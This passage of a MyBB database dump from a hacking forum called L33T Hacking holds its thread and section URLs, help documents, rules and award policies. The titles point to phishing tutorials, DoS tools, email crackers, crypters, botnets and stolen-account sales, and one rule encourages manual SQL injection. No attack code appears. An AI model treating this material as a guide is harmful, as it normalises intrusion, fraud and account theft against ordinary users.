'2', 'Test'); INSERT INTO mybb_google_seo VALUES('1', '3', '4', 'forumdisplay.php?Introduction'); INSERT INTO mybb_google_seo VALUES('1', '3', '5', 'forumdisplay.php?Staff'); INSERT INTO mybb_google_seo VALUES('1', '3', '6', 'Miscellaneous'); INSERT INTO mybb_google_seo VALUES('1', '3', '7', 'forumdisplay.php?Off-Topic'); INSERT INTO mybb_google_seo VALUES('1', '3', '8', 'forumdisplay.php?Music'); INSERT INTO mybb_google_seo VALUES('1', '3', '9', 'forumdisplay.php?Monetizing-Techniques'); INSERT INTO mybb_google_seo VALUES('1', '3', '10', 'Blackhat'); INSERT INTO mybb_google_seo VALUES('1', '3', '11', 'forumdisplay.php?Help-Desk'); INSERT INTO mybb_google_seo VALUES('1', '3', '13', 'forumdisplay.php?Website-and-Forum-Hacking'); INSERT INTO mybb_google_seo VALUES('1', '3', '14', 'forumdisplay.php?Anonymity'); INSERT INTO mybb_google_seo VALUES('1', '3', '15', 'forumdisplay.php?Tools-and-Programs'); INSERT INTO mybb_google_seo VALUES('1', '3', '16', 'forumdisplay.php?Social-Engineering-and-Human-Manipulation'); INSERT INTO mybb_google_seo VALUES('1', '3', '17', 'forumdisplay.php?E-Whoring'); INSERT INTO mybb_google_seo VALUES('1', '3', '18', 'forumdisplay.php?AIM-MSN-IRC-ICQ-and-IM-Hacks'); INSERT INTO mybb_google_seo VALUES('1', '3', '19', 'forumdisplay.php?Junk'); INSERT INTO mybb_google_seo VALUES('1', '3', '20', 'forumdisplay.php?File-Protection-Crypters-Cryptography-etc'); INSERT INTO mybb_google_seo VALUES('1', '3', '21', 'forumdisplay.php?Botnets-and-IRC-Bots-Zombies'); INSERT INTO mybb_google_seo VALUES('1', '3', '22', 'Whitehat'); INSERT INTO mybb_google_seo VALUES('1', '3', '23', 'forumdisplay.php?White-Hat-Help'); INSERT INTO mybb_google_seo VALUES('1', '3', '24', 'forumdisplay.php?Miscellaneous-Computer-Talk'); INSERT INTO mybb_google_seo VALUES('1', '3', '25', 'forumdisplay.php?Computer-Protection-and-Security-Breaches'); INSERT INTO mybb_google_seo VALUES('1', '3', '26', 'LH-Elite'); INSERT INTO mybb_google_seo VALUES('1', '3', '27', 'forumdisplay.php?Sign-up-for-Elite'); INSERT INTO mybb_google_seo VALUES('1', '3', '28', 'Elite-Discussion-Area'); INSERT INTO mybb_google_seo VALUES('1', '3', '29', 'Advanced-Methods'); INSERT INTO mybb_google_seo VALUES('1', '3', '30', 'Premium-Downloads'); INSERT INTO mybb_google_seo VALUES('1', '3', '31', 'Upgraded'); INSERT INTO mybb_google_seo VALUES('1', '3', '32', 'GFX-Corner'); INSERT INTO mybb_google_seo VALUES('1', '3', '33', 'forumdisplay.php?Graphics-Help-Desk'); INSERT INTO mybb_google_seo VALUES('1', '3', '34', 'forumdisplay.php?Tutorials-and-Guides'); INSERT INTO mybb_google_seo VALUES('1', '3', '35', 'forumdisplay.php?Graphics-Lounge'); INSERT INTO mybb_google_seo VALUES('1', '3', '37', 'Marketplace-Discussions'); INSERT INTO mybb_google_seo VALUES('1', '3', '38', 'forumdisplay.php?Scam-Reports'); INSERT INTO mybb_google_seo VALUES('1', '3', '39', 'Premium-Sellers'); INSERT INTO mybb_google_seo VALUES('1', '3', '40', 'Secondary-Sellers'); INSERT INTO mybb_google_seo VALUES('1', '3', '41', 'Auctions'); INSERT INTO mybb_google_seo VALUES('1', '3', '42', 'forumdisplay.php?News-and-Happening'); INSERT INTO mybb_google_seo VALUES('1', '3', '43', 'forumdisplay.php?PIDs-Serials-CD-Keys-etc'); INSERT INTO mybb_google_seo VALUES('1', '3', '44', 'forumdisplay.php?Receipts-and-POPs'); INSERT INTO mybb_google_seo VALUES('1', '3', '45', 'forumdisplay.php?SEing-Graphical-help'); INSERT INTO mybb_google_seo VALUES('1', '3', '46', 'forumdisplay.php?Phishing-and-Tabnabbing'); INSERT INTO mybb_google_seo VALUES('1', '3', '47', 'forumdisplay.php?Member-Contests'); INSERT INTO mybb_google_seo VALUES('1', '3', '48', 'forumdisplay.php?Mod'); INSERT INTO mybb_google_seo VALUES('1', '3', '49', 'forumdisplay.php?Suggestions-and-Ideas'); INSERT INTO mybb_google_seo VALUES('1', '3', '50', 'forumdisplay.php?Complaints-and-Rep-Abuse-Support'); INSERT INTO mybb_google_seo VALUES('1', '3', '51', 'Coding'); INSERT INTO mybb_google_seo VALUES('1', '3', '52', 'forumdisplay.php?Visual-Basic-and-Net-Framework'); INSERT INTO mybb_google_seo VALUES('1', '3', '53', 'forumdisplay.php?Java'); INSERT INTO mybb_google_seo VALUES('1', '3', '54', 'forumdisplay.php?Premium-Accounts'); INSERT INTO mybb_google_seo VALUES('1', '3', '55', 'forumdisplay.php?Gay-Free-Requests'); INSERT INTO mybb_google_seo VALUES('1', '3', '56', 'forumdisplay.php?Forum-Games'); INSERT INTO mybb_google_seo VALUES('1', '3', '57', 'Groups'); INSERT INTO mybb_google_seo VALUES('1', '3', '58', 'forumdisplay.php?Group-Recruitments-and-Discussions'); INSERT INTO mybb_google_seo VALUES('1', '3', '59', 'forumdisplay.php?Ebooks'); INSERT INTO mybb_google_seo VALUES('1', '3', '60', 'Private-Forums'); INSERT INTO mybb_google_seo VALUES('1', '3', '62', 'forumdisplay.php?Account-Activation-Issues'); INSERT INTO mybb_google_seo VALUES('1', '4', '205', 'showthread.php?First-Java-Multiplayer-Game'); INSERT INTO mybb_google_seo VALUES('1', '4', '133', 'showthread.php?Online-Scanners-list'); INSERT INTO mybb_google_seo VALUES('1', '3', '3', 'forumdisplay.php?Announcements-Feedback-Bugs-and-Suggestions'); INSERT INTO mybb_google_seo VALUES('1', '1', '7', 'Romdu62'); INSERT INTO mybb_google_seo VALUES('1', '1', '13', 'unixmoon'); INSERT INTO mybb_google_seo VALUES('1', '1', '17', 'khade009'); INSERT INTO mybb_google_seo VALUES('1', '1', '62', 'R?????zo?'); INSERT INTO mybb_google_seo VALUES('1', '1', '67', 'HoverCatz'); INSERT INTO mybb_google_seo VALUES('1', '1', '84', 'Thunder™'); INSERT INTO mybb_google_seo VALUES('1', '1', '90', 'duhuh'); INSERT INTO mybb_google_seo VALUES('1', '1', '141', 'Bane™'); INSERT INTO mybb_google_seo VALUES('1', '1', '154', 'fap'); INSERT INTO mybb_google_seo VALUES('1', '1', '171', 'W33D'); INSERT INTO mybb_google_seo VALUES('1', '4', '106', 'showthread.php?Filling-a-scam-report'); INSERT INTO mybb_google_seo VALUES('1', '4', '116', 'showthread.php?tut-Creating-a-Kindle-PID'); INSERT INTO mybb_google_seo VALUES('1', '4', '121', 'showthread.php?kurosaki-s-DOS-Tool'); INSERT INTO mybb_google_seo VALUES('1', '4', '164', 'showthread.php?Experiences-on-your-upgrade'); INSERT INTO mybb_google_seo VALUES('1', '4', '180', 'showthread.php?Free-Saddam-s-Crypter-VB-Net-source-and-19-more-No-surveys'); INSERT INTO mybb_google_seo VALUES('1', '4', '195', 'showthread.php?Selling-Cheap-Netflix-Accounts'); INSERT INTO mybb_google_seo VALUES('1', '4', '212', 'showthread.php?Official-New-Groups-Questions-Inquires-Policies-and-More'); INSERT INTO mybb_google_seo VALUES('1', '4', '217', 'showthread.php?Fun-Find-the-SEX-of-your-Computer'); INSERT INTO mybb_google_seo VALUES('1', '4', '234', 'showthread.php?Free-E-Whoring-packs-website-plus-free-PORN'); INSERT INTO mybb_google_seo VALUES('1', '4', '232', 'showthread.php?Triple-H'); INSERT INTO mybb_google_seo VALUES('1', '4', '238', 'showthread.php?Ban-the-user-above-you'); INSERT INTO mybb_google_seo VALUES('1', '4', '266', 'showthread.php?Win-a-Free-Netflix-Account'); INSERT INTO mybb_google_seo VALUES('1', '4', '268', 'showthread.php?Suggestion-Forum-News-Section'); INSERT INTO mybb_google_seo VALUES('1', '4', '277', 'showthread.php?Any-phreaking-tutorials'); INSERT INTO mybb_google_seo VALUES('1', '4', '283', 'showthread.php?Proxy-List-August-2012-Working'); INSERT INTO mybb_google_seo VALUES('1', '4', '287', 'showthread.php?steam-account'); INSERT INTO mybb_google_seo VALUES('1', '4', '295', 'showthread.php?ebook-Crypter-Blueprint'); INSERT INTO mybb_google_seo VALUES('1', '4', '302', 'showthread.php?Java-DoS-Script'); INSERT INTO mybb_google_seo VALUES('1', '4', '311', 'showthread.php?UploadNSell-Scraper'); INSERT INTO mybb_google_seo VALUES('1', '4', '314', 'showthread.php?Testing-Staff-Message-MyCode'); INSERT INTO mybb_google_seo VALUES('1', '4', '313', 'showthread.php?VB-net-Source-PayPal-Cash-System'); INSERT INTO mybb_google_seo VALUES('1', '4', '318', 'showthread.php?Want-to-Earn-Money-by-doing-Nothing'); INSERT INTO mybb_google_seo VALUES('1', '4', '321', 'showthread.php?Full-Signature-Tutorial'); INSERT INTO mybb_google_seo VALUES('1', '4', '326', 'showthread.php?TUT-Free-Restaurant-Gift-Cards'); INSERT INTO mybb_google_seo VALUES('1', '4', '328', 'showthread.php?Mod-Notice-in-threads'); INSERT INTO mybb_google_seo VALUES('1', '4', '331', 'showthread.php?New-Rules-and-Instructions-v-2'); INSERT INTO mybb_google_seo VALUES('1', '4', '332', 'showthread.php?Hello'); INSERT INTO mybb_google_seo VALUES('1', '4', '333', 'showthread.php?Six-Degrees-Made-For-Adult-Students'); INSERT INTO mybb_google_seo VALUES('1', '4', '335', 'showthread.php?ESET-NOD32-Antivirus-ESET-Smart-Security-Username-And-Password-4-sept-2012'); INSERT INTO mybb_google_seo VALUES('1', '4', '339', 'showthread.php?Req-Torrentleech-invite'); INSERT INTO mybb_google_seo VALUES('1', '4', '345', 'showthread.php?Need-userbar-Gamers'); INSERT INTO mybb_google_seo VALUES('1', '4', '347', 'showthread.php?Junk-Warning'); INSERT INTO mybb_google_seo VALUES('1', '4', '348', 'showthread.php?Brazzers-Cracker'); INSERT INTO mybb_google_seo VALUES('1', '4', '349', 'showthread.php?Everyone-Read'); INSERT INTO mybb_google_seo VALUES('1', '4', '350', 'showthread.php?WESTi-s-Email-Cracker-Crack-Any-E-Mail-Hotmail-Yahoo-Gmail'); INSERT INTO mybb_google_seo VALUES('1', '4', '351', 'showthread.php?Phishing-Tutorial'); INSERT INTO mybb_google_seo VALUES('1', '4', '352', 'showthread.php?How-to-Take-Down-Websites-Effectively-Proof'); INSERT INTO mybb_google_seo VALUES('1', '4', '353', 'showthread.php?Complete-Guide-How-to-crack-All-Sites-Hosting-With-Apex-Complete-Guide'); INSERT INTO mybb_google_seo VALUES('1', '4', '354', 'showthread.php?MBAM-Self-Help-Removal-Tutorials'); INSERT INTO mybb_google_seo VALUES('1', '4', '359', 'showthread.php?Easiest-Hacking-Technique-EVER'); INSERT INTO mybb_google_seo VALUES('1', '4', '361', 'showthread.php?Xbox-live-Code-1-Month'); INSERT INTO mybb_google_seo VALUES('1', '4', '363', 'showthread.php?Top-10-songs-of-September-2012'); INSERT INTO mybb_google_seo VALUES('1', '4', '257', 'showthread.php?Nice-Video-Edit'); INSERT INTO mybb_google_seo VALUES('1', '1', '83', 'rixxon'); INSERT INTO mybb_google_seo VALUES('1', '1', '64', 'vlajke'); INSERT INTO mybb_google_seo VALUES('1', '1', '99', 'Lukieboiz'); INSERT INTO mybb_google_seo VALUES('1', '4', '365', 'showthread.php?HAHA-SHIT-CAN-WORK'); INSERT INTO mybb_google_seo VALUES('1', '1', '28', 'debojyotip'); DROP TABLE IF EXISTS mybb_groupleaders; CREATE TABLE mybb_groupleaders ( lid smallint(5) unsigned NOT NULL auto_increment, gid smallint(5) unsigned NOT NULL, uid int(10) unsigned NOT NULL, canmanagemembers int(1) NOT NULL, canmanagerequests int(1) NOT NULL, PRIMARY KEY (lid) ); INSERT INTO mybb_groupleaders VALUES('5', '12', '232', '1', '1'); INSERT INTO mybb_groupleaders VALUES('7', '13', '62', '1', '1'); INSERT INTO mybb_groupleaders VALUES('4', '17', '61', '1', '1'); INSERT INTO mybb_groupleaders VALUES('10', '20', '100', '1', '1'); INSERT INTO mybb_groupleaders VALUES('11', '21', '228', '1', '1'); DROP TABLE IF EXISTS mybb_helpdocs; CREATE TABLE mybb_helpdocs ( hid smallint(5) unsigned NOT NULL auto_increment, sid smallint(5) unsigned NOT NULL, name varchar(120) NOT NULL, description text NOT NULL, document text NOT NULL, usetranslation int(1) NOT NULL, enabled int(1) NOT NULL, disporder smallint(5) unsigned NOT NULL, PRIMARY KEY (hid) ); INSERT INTO mybb_helpdocs VALUES('1', '1', 'User Registration', 'Perks and privileges to user registration.', 'Some parts of this forum may require you to be logged in and registered. Registration is free and takes a few minutes to complete.
\r\n
\r\nYou are encouraged to register; once you register you will be able to post messages, set your own preferences, and maintain a profile.
\r\n
\r\nSome of the features that generally require registration are subscriptions, changing of styles, accessing of your Personal Pad (simple notepad) and emailing forum members.', '1', '1', '1'); INSERT INTO mybb_helpdocs VALUES('2', '1', 'Updating Profile', 'Changing your data currently on record.', 'At some point during your stay, you may decide you need to update some information such as your instant messenger information, your password, or perhaps you need to change your email address. You may change any of this information from your user control panel. To access this control panel, simply click on the link in the upper right hand corner of most any page entitled \"user cp\". From there, simply choose \"Edit Profile\" and change or update any desired items, then proceed to click the submit button located at the bottom of the page for changes to take effect.', '1', '1', '2'); INSERT INTO mybb_helpdocs VALUES('3', '1', 'Use of Cookies on myBB', 'myBB uses cookies to store certain information about your registration.', 'myBulletinBoard makes use of cookies to store your login information if you are registered, and your last visit if you are not.
\r\n
\r\nCookies are small text documents stored on your computer; the cookies set by this forum can only be used on this website and pose no security risk.
\r\n
\r\nCookies on this forum also track the specific topics you have read and when you last read them.
\r\n
\r\nTo clear all cookies set by this forum, you can click here.', '1', '1', '3'); INSERT INTO mybb_helpdocs VALUES('4', '1', 'Logging In and Out', 'How to login and log out.', 'When you login, you set a cookie on your machine so that you can browse the forums without having to enter in your username and password each time. Logging out clears that cookie to ensure nobody else can browse the forum as you.
\r\n
\r\nTo login, simply click the login link at the top right hand corner of the forum. To log out, click the log out link in the same place. In the event you cannot log out, clearing cookies on your machine will take the same effect.', '1', '1', '4'); INSERT INTO mybb_helpdocs VALUES('5', '2', 'Posting a New Topic', 'Starting a new thread in a forum.', 'When you go to a forum you are interested in and you wish to create a new topic (or thread), simply choose the button at the top and bottom of the forums entitled \"New topic\". Please take note that you may not have permission to post a new topic in every forum as your administrator may have restricted posting in that forum to staff or archived the forum entirely.', '1', '1', '1'); INSERT INTO mybb_helpdocs VALUES('6', '2', 'Posting a Reply', 'Replying to a topic within a forum.', 'During the course of your visit, you may encounter a thread to which you would like to make a reply. To do so, simply click the \"Post reply\" button at the bottom or top of the thread. Please take note that your administrator may have restricted posting to certain individuals in that particular forum.
\r\n
\r\nAdditionally, a moderator of a forum may have closed a thread meaning that users cannot reply to it. There is no way for a user to open such a thread without the help of a moderator or administrator.', '1', '1', '2'); INSERT INTO mybb_helpdocs VALUES('7', '2', 'MyCode', 'Learn how to use MyCode to enhance your posts.', 'You can use MyCode, a simplified version of HTML, in your posts to create certain effects.\r\n

\r\n[spoiler]text here[/spoiler]\r\n

\r\n[hl=COLOR]Highlight text[/hl]\r\n

\r\n[lock]Content is hidden til you post[/lock]
\r\nDemo: http://l33thacking.net/thread-1031-post-5957.html\r\n


\r\nWant someone to do a google search but they are lazy?

\r\n[gsearch]L33T Hacking[/gsearch]\r\n


\r\n[b]This text is bold[/b]
\r\n   This text is bold\r\n

\r\n[i]This text is italicized[/i]
\r\n   This text is italicized\r\n

\r\n[u]This text is underlined[/u]
\r\n   This text is underlined\r\n


\r\n[url]http://www.example.com/[/url]
\r\n   http://www.example.com/\r\n

\r\n[url=http://www.example.com/]Example.com[/url]
\r\n   Example.com\r\n

\r\n[email]example@example.com[/email]
\r\n   example@example.com\r\n

\r\n[email=example@example.com]E-mail Me![/email]
\r\n   E-mail Me!\r\n

\r\n[email=example@example.com?subject=spam]E-mail with subject[/email]
\r\n   E-mail with subject\r\n


\r\n[quote]Quoted text will be here[/quote]
\r\n   Quoted text will be here\r\n

\r\n[code]Text with preserved formatting[/code]
\r\n   Text with preserved formatting\r\n


\r\n[img]http://www.php.net/images/php.gif[/img]
\r\n   \r\n

\r\n[img=50x50]http://www.php.net/images/php.gif[/img]
\r\n   \r\n


\r\n[color=red]This text is red[/color]
\r\n   This text is red\r\n

\r\n[size=3]This text is size 3[/size]
\r\n   This text is size 3\r\n

\r\n[font=Tahoma]This font is Tahoma[/font]
\r\n   This font is Tahoma\r\n


\r\n[align=center]This is centered[/align]

This is centered
\r\n

\r\n[align=right]This is right-aligned[/align]

This is right-aligned
\r\n


\r\n[list]
\r\n[*]List Item #1
\r\n[*]List Item #2
\r\n[*]List Item #3
\r\n[/list]
\r\n

You can make an ordered list by using [list=1] for a numbered, and [list=a] for an alphabetical list.', '0', '1', '3'); INSERT INTO mybb_helpdocs VALUES('8', '3', 'Rules', 'L33THacking Rules and Regulations', '

Official LH rules
\r\n
\r\n1. We do not allow Post here and PM me threads. Use the lock code to hide download links.\r\n
\r\n
\r\n2. No short, low quality posts like \"bump\", \"lol\", \"roflmao\", \"thanks\", \"Troll\" and any repeated characters to defeat the min character count. Posts written completely in another language will also be considered LQP.\r\n
\r\n
\r\n3. Don\'t attempt to infect members with any kind of virus, RATs, Keyloggers and trojans.\r\n
\r\n
\r\n4. You are not allowed to post dumps. DOX informations are highly recommended to not be posted unless they are approved by an Admin.\r\n
\r\n
\r\n5. You cannot ask for or offer reputation in posts, signatures, or PM. This includes encouragement like \"reputation is appreciated\".\r\n
\r\n
\r\n6. No adult images, adult links, or adult account trading.\r\n
\r\n
\r\n7. Multiple accounts will not be allowed unless you are reporting your original account as hacked. Ban evading will result in the permanent closing of your old account and new accounts. No exceptions.\r\n
\r\n
\r\n8. Advertising of competing sites is not allowed. This refers to hacking sites related to LH. Websites without forums or forums unrelated to hacking are acceptable. Advertising includes anywhere on L33T Hacking board.\r\n
\r\n
\r\n9. No posting of fake programs.\r\n
\r\n
\r\n10. No threads, posts or PMs on donations. We do not allow loan requests.\r\n
\r\n
\r\n11. No political or religious expression in your profile. This includes user titles, signatures, and avatars.\r\n
\r\n
\r\n12. You are not allowed to keep site goals in your signature, avatar, usertitle or anywhere on L33T Hacking.\r\n
\r\n
\r\n13. We would not allow discussions or distribution of Havij or any similar program, we would like to encourage manual SQL Injection rather than using automatic programs (Skid). Programs include vulnerability scanners, auto-exploiters or anything of this sort.\r\n
\r\n
\r\n14. Members are not allowed to engage in threatening behavior toward other members. This includes flaming. Threats to steal accounts, swat or dox would not be tolerated. Any onsite material including posts and PMs.\r\n
\r\n
\r\n15. We recommend to use the [lock] mycode to hide download links however we do not allow the [lock] mycode in the Upgraded tab. For more information Click Here', '0', '1', '1'); INSERT INTO mybb_helpdocs VALUES('9', '3', 'When to contact staff', 'Quick FAQs on when to contact a staff member. ', '
I want to report a post, can I PM the staff member?
\r\nNo, you may not. Click on the report post button on the post of the user and choose the category that it is in.\r\n
\r\n
\r\n
Someone negative repped me, can I contact a staff member to remove it?
\r\nNo, but if you believe that you don\'t deserve the rep and you are being rep abused then feel free to contact Apathy. \r\n
\r\n
\r\n
I\'m bored, can I contact a staff member to chill?
\r\nWell you can but it depends on the staff member. If he is a busy person then they might repfuck you.\r\n
\r\n
\r\n
I some questions, can I contact a staff member?
\r\nYes you may, but you can post in our Announcements, Feedback, Bugs and Suggestions section.\r\n
\r\n
\r\n
I bought an upgrade, but haven\'t been upgraded yet
\r\nThe upgrades take up to 48 hours, if you haven\'t been upgraded then let any admin know about it.\r\n
\r\n
\r\n
I want to report a staff member
\r\nDon\'t be afraid, feel free to send t3h jok3r also please provide as much REAL proof as possible.\r\n
\r\n
\r\n
Can I ask an admin to give me an award?
\r\nNo awards are given at our discretion.\r\n
\r\n
\r\n
Can I PM them a suggestion?
\r\nNo, we have a suggestions forum for a reason. \r\n
\r\n
\r\n
Staff Roles
\r\n
\r\nAdmins :- You can contact them regarding anything.
\r\n
  • Apathy :-\r\n He is in-charge or reputation abuse and awards.
  • \r\n
  • T3h Jok3r :- In-charge of upgrades, help documents and everything else not listed for other staff.
  • \r\n
  • LOOKING, PM JOKER FOR NOW :- In-charge of stolen accounts, stickies and issues regarding bans.
  • \r\n
    \r\nStaff :- They handle all kinds of reports and also look after the forums. They also answer your questions and guide you around LH. They can give out warnings and moderate all the forums.\r\n
    \r\n
    \r\nModerators :- They moderate specific forums, but can\'t give out warnings. They are here to help you. They can only handle reports made in their forums.', '0', '1', '2'); INSERT INTO mybb_helpdocs VALUES('10', '3', 'Warning System', 'The Warning System Explained.', '
    Why was I given a warning?
    \r\nThe answer to your question(s) will be the type of warning, receive a PM or we will recommend you to know the Help Documents.\r\n
    \r\n
    \r\n
    Can I get my warning removed?
    \r\nNo, we will not remove your warning and if you plan to bribing to get your warning remove then please note that we will NOT take this matter lightly.\r\n
    \r\n
    \r\n
    I believe I was given a warning that I don\'t deserve.
    \r\nContact the staff member who issued the warning regarding your problem.\r\n
    \r\n
    \r\n
    Do warnings ever expire?
    \r\nYes they do, only some bans are permanent.\r\n
    \r\n
    \r\n
    Warning Reasons and Points
    \r\n Adult Content (+20 points)
    \r\n Cross Posting (+20 points)
    \r\n Disallowed Blackhat Activity (+30 points)
    \r\n Donation Begging (+10 points)
    \r\n Infected download or link (+25 points)
    \r\n Leeching (+20 points)
    \r\n Nonsense (+10 points)
    \r\n Off topic or Unrelated (+10 points)
    \r\n Personal Data (+15 points)
    \r\n Profile Violation (+15 points)
    \r\n Reputation Abuse (+25 points)
    \r\n SPAM (+20 points)
    \r\n Threat or Harassment (+40 points)
    \r\n Wrong Forum (+15 points)
    \r\n
    \r\n ', '0', '1', '4'); INSERT INTO mybb_helpdocs VALUES('11', '3', 'Profile policies, violations and rules.', 'Profile policies and other rules regarding your profile.', '
    Basic Rules List
    \r\n\r\n1. You cannot buy, sell, trade, or share your account.
    \r\n\r\n2. We do not allow multiple accounts except a UID_TEMP account as explained in our \"Stolen and Lost LH Accounts\" help doc.
    \r\n\r\n3. No religious, nationality, or political expression in your profile.
    \r\n\r\n4. No adult images such as nudity.
    \r\n\r\n5. You cannot link to competing sites. We consider competing sites to be anything that has topics similar to those under our Hacking tab.
    \r\n\r\n6. No image rotation or scripts images (ip grabber) for your avatar or signature.
    \r\n\r\n7. No site goals such as \"1000 Posts\" or \"100 Reps\".
    \r\n\r\n8. All text must be in English or readable as English in the case of fancy unicode.
    \r\n\r\n9. You cannot impersonate staff, admins, or mentors.
    \r\n\r\n10. No linking to shock sites.

    \r\n\r\n\r\n\r\n
    I received a \"Profile Violation\" warning but it doesn\'t say anything else. What was it for?
    \r\n\r\nIf you did not receive a PM with your warning then I don\'t know. But if you read this entire Help Doc, you should be able to figure it out. Just make sure to understand our policies to avoid future warnings.\r\n\r\n

    \r\n\r\n\r\n\r\n
    What is the maximum signature image size?
    \r\n\r\nSignature images can be no wider than 650px, no taller than 200px, and no bigger than 500k.\r\n\r\n

    \r\n\r\n\r\n\r\n
    What if my signature only has text? Is there a limit?
    \r\n\r\nWe don\'t enforce an exact size with text. Our settings are 255 characters including mycode. Do not enlarge your signature with enormous text or lots of spaces. Just be reasonable with your sig size.\r\n\r\n

    \r\n\r\n\r\n\r\n
    Why not extend the max characters or at least discount the mycode for signatures?
    \r\n\r\nThis is our limit. You\'ll have to deal with it. We are not going to extend it or change how it works. Everyone has the same limitations on LH. \r\n\r\n

    \r\n\r\n\r\n\r\n
    Why can\'t I upload an avatar?
    \r\n\r\nLH has some default avatars in the gallery. Upgraded members are the only ones who can use avatar uploads. If you\'ve received a no permission page, it\'s likely you\'re a regular member attempting to upload. Use the avatar URL which means you must have the image hosted elsewhere. Please make sure the remote avatar is within site guidelines.\r\n\r\n

    \r\n\r\n\r\n\r\n
    What\'s the max avatar size for remote avatars?
    \r\n\r\nRemote avatars are resized to fit on the postbit but MyBB does not check the K size of the file. However we enforce a 70k max size. Anyone using a higher sized avatar will be warned and their avatar removed.\r\n\r\n

    \r\n\r\n\r\n\r\n
    Can I use the same avatar or signature as a staff member?
    \r\n\r\nNo you may not. Impersonating staff with your username, usertitle, signature, or avatar is going to be a reason to ban you. We take this really seriously. The potential for abuse is enormous so it will not be allowed even as a joke.\r\n\r\n

    \r\n\r\n\r\n\r\n
    What are the rules for usertitles?
    \r\n\r\nBasically the same as all the other rules for a profile. Don\'t impersonate staff, flame members, use religious or political symbols and don\'t advertise a competing forum.\r\n\r\n

    \r\n\r\n\r\n\r\n
    I have a forum or am a member of one can I advertise it in my profile?
    \r\n\r\nLH has a strict rule about advertising competing sites. We consider competing sites any forum with subjects or forum categories that are similar to ones under our Hacking tab. Advertising is not allowed in profiles.\r\n\r\n

    \r\n\r\n\r\n\r\n
    Can I express my religion, nationality, or political affiliation in my profile?
    \r\n\r\nNo you can\'t. This was a more recent addition to our rules. While we\'d like to think LH is full of open-minded individuals that respect each other the reality is that it\'s not. Having religion or political expression in your profile will invite flames and negative reputations. That\'s something we want to avoid. We have a forum for debating called \"Science, Religion, Philosophy, and Politics\".\r\n\r\n

    \r\n\r\n\r\n\r\n
    It seems outrageous you don\'t allow religion or politics on LH. Why is that?
    \r\n\r\nLH is not the place for you to spread your faith or recruit for your cause. It was never designed for such discussion. We have an international community and we want all members to respect each other for who they are not what they believe in or represent. We wish the world was a respectful happy place but it\'s not. We are not going to allow strife to be part of LH.\r\n\r\n

    \r\n\r\n\r\n\r\n\r\n\r\n
    Can I have sexy pics in my profile?
    \r\n\r\nTo a point you can. We do not allow nudity and if staff feels your image is too overt, it could be removed and you might receive a warning.\r\n\r\n

    \r\n\r\n\r\n\r\n
    Someone is flaming me or calling me a scammer in their signature. What can I do?
    \r\n\r\nContact staff please. We\'ll look into it. \r\n\r\n

    \r\n\r\n\r\n\r\n
    Can I have site goals in my sig?
    \r\n\r\nGoals we don\'t allow include reps, groups, posts, or upgrades. \r\n\r\n

    \r\n\r\n\r\n\r\n
    Can I have referral links in my sig? Stuff like adf.ly?
    \r\n\r\nYes this is allowed on LH. Be aware Sharecash and some other services are censored.\r\n\r\n

    \r\n\r\n\r\n\r\n
    Can I have donation request or link in my signature?
    \r\n\r\nYes you can have them in your signature but we have rules about threads/posts for begging. If you want a donation begging signature, go for it. \r\n\r\n

    \r\n\r\n\r\n\r\n
    I don\'t see where my MSN, AIM, or email display in my profile. Can I put them in my signature?
    \r\n\r\nYes you can but we advise you do not. This site has some malicious users that might use your personal information in ways you don\'t expect. You can be targeted very easily by posting any private data about yourself on this site. So be careful if you do.\r\n\r\n

    \r\n\r\n\r\n\r\n
    Can I put fake links or shock site links in my signature?
    \r\n\r\nNo you cannot. We won\'t allow deceiving links such as fake spoilers links or links disguised in order to trick members into visiting shock sites. Use some common sense please.\r\n\r\n

    \r\n\r\n\r\n\r\n
    Are we allowed dynamic sigs such as counters or image rotators?
    \r\n\r\nNo. You\'re not allowed to use dynamic sigs on LH. They can be abused and normally slow the loading of pages. So we ask that you do not use dynamic images in your sig. This rule also applies to avatars.\r\n\r\n

    \r\n\r\n\r\n\r\n
    I was rep fucked by staff. Can I complain about it in my profile?
    \r\n\r\nYou are not allowed to rep fuck complain anywhere on your profile or even in posts. You will be banned for one month if you do.\r\n\r\n

    ', '0', '1', '5'); INSERT INTO mybb_helpdocs VALUES('12', '3', 'Awards System Explained', 'How are awards work out and how to obtain them.', '
    Staff can\'t add awards to themselves!
    \r\nStaff members can only give awards to other people. Staff can\'t give themselves awards without having an admins permissions.\r\n
    \r\n
    \r\n
    How to activate an award?
    \r\nUsercp>Achivements>Select awards>Show in postbit\r\n

    \r\n
    How to obtain an award?
    \r\nAwards are given at Staffs discretion. Please do not PM us saying why you deserve a specific award. You are only allowed to PM about some awards which I will discuss below.\r\n
    \r\n
    \r\n
    Who is in-charge of the awards?
    \r\nAt the moment it\'s NXK but feel free to contact t3h jok3r regarding an award. \r\n
    \r\n
    \r\n
    How are allowed to give out awards?
    \r\nAdmins can give out any kind of award. Staff can give out some awards that they have access to.\r\n
    \r\n
    \r\n
    I want to reorganize my awards list!
    \r\nSorry, but we do not reorganize your awards list to your liking. \r\n
    \r\n
    \r\n
    Can I buy an award?
    \r\nYou can\'t buy any awards. The donation awards are awards for those who support LH by donating money, we do not position it as a \"buy in\" award. \r\n
    \r\n
    \r\n
    Do only upgraded members get awards?
    \r\nNo, regular members can get awards too. \r\n
    \r\n
    \r\n
    What will happen if I ask for an award?
    \r\nYou might get repfucked or your request will be ignored. The action depends on the staff member and remember you have been warned. \r\n
    \r\n
    \r\n
    AWARDS
    \r\n

    \r\nThe following awards are granted automatically.\r\n

    \r\nCheers on 100 : User has reached 100 posts
    \r\nPosting Freak : This user has 500+ posts
    \r\nSpammer : Given to those who have 1,000 posts.
    \r\n10 Threads : Self-explanatory
    \r\nContributor : Granted to those who have reached 100 threads.
    \r\nNo life : This member has no life and is too addicted to LH.
    \r\n
    \r\n
    \r\nThe following awards are given manually by staff.\r\n
    \r\n
    \r\nYouTube : Create a YouTube video advertising LH, include your UID in the video.
    \r\nAss Kisser : Self-explanatory
    \r\nPainter : Good at graphic designing
    \r\nMusic Fan : Post valid proof showing how much you love listening to music.
    \r\nGold Brick : Do a lot of great program and ebook giveaways.
    \r\nSilver Brick : Post a original and unique tutorial
    \r\nSwag : Where the polos at? (Gotta be flee son)
    \r\nGamer : This one looks easy but it\'s hard to get. Beat a Mod or post your prestige etc.
    \r\nSticky : Got a thread stickied.
    \r\nDangerous Programmar : Create and give away 3+ blackhat tools and/or programs for free on LH. This excludes Chat Spammer, Doxer and resolver.
    \r\nAngel: Has done well helping out others
    \r\nReferrer : You have referred 10 or more members. All must be activated.
    \r\nSE Legend : Proven SE Legend or SE a product for LH staff.
    \r\n
    \r\n
    \r\nAwards given by Admins only.\r\n
    \r\n
